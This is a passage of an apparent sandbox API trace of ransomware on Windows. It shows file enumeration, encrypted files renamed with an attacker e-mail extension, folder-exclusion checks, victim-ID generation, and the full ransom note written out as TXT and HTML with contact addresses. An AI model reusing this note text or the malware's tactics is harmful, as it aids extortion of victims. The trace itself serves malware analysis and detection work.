	[0163.169] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x7aa9178c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7abdf359, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0163.169] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0163.169] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abdf359, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7abdf359, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ac055f6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0163.169] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abdf359, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7abdf359, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7abdf359, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0163.169] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78af0919, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78af0919, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78b16d65, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5230, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0163.169] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1
	[0163.170] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79f5ad4b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x79f5ad4b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7aa9178c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x38b5d0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 1
	[0163.170] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79f5ad4b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x79f5ad4b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7aa9178c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x38b5d0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 0
	[0163.170] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0163.170] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0163.172] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 0
	[0163.173] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0163.174] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0163.175] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd584c46a, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9566930B-D1DD-4075-BFE6-74DD69B13189", cAlternateFileName="956693~1")) returned 1
	[0163.175] lstrcmpW (lpString1="9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2="..") returned 1
	[0163.175] lstrcmpW (lpString1="9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2=".") returned 1
	[0163.175] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0163.175] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0163.175] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="9566930B-D1DD-4075-BFE6-74DD69B13189" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189"
	[0163.175] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189"
	[0163.175] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\"
	[0163.176] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\"
	[0163.176] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*"
	[0163.176] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5911742, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0163.178] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*") returned 80
	[0163.178] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.178] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*", cchLength=0x50 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*") returned 0x50
	[0163.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="windows") returned 0x0
	[0163.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="boot") returned 0x0
	[0163.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="system volume information") returned 0x0
	[0163.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0163.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.180] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="temp") returned 0x0
	[0163.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.180] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="program files") returned 0x0
	[0163.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.180] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="program files (x86)") returned 0x0
	[0163.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.180] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="appdata") returned 0x0
	[0163.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.181] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="application data") returned 0x0
	[0163.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.181] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="winnt") returned 0x0
	[0163.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.181] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="tmp") returned 0x0
	[0163.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.182] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="cache") returned 0x0
	[0163.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.182] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="temporary internet files") returned 0x0
	[0163.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.182] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="webcache") returned 0x0
	[0163.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.182] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="inetcache") returned 0x0
	[0163.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.183] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="nvidia") returned 0x0
	[0163.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.183] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="packages") returned 0x0
	[0163.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.183] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="cookies") returned 0x0
	[0163.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.183] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="programdata") returned 0x0
	[0163.184] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5911742, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0163.184] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5926364, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5926364, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-us.16", cAlternateFileName="")) returned 1
	[0163.185] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 1
	[0163.185] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 0
	[0163.185] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0163.185] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0163.185] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189"
	[0163.186] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*"
	[0163.186] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.186] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.186] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.TXT") returned 104
	[0163.186] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0163.187] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0163.187] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0163.192] CloseHandle (hObject=0x388) returned 1
	[0163.192] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.193] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0163.194] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0163.194] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0163.194] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0163.195] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0163.195] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0163.196] CloseHandle (hObject=0x388) returned 1
	[0163.196] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.196] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.197] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0163.197] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.HTML") returned 105
	[0163.197] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0163.201] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0163.201] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0163.221] CloseHandle (hObject=0x388) returned 1
	[0163.222] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.222] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.223] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0163.224] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0163.224] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0163.225] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0163.225] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0163.225] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0163.225] CloseHandle (hObject=0x388) returned 1
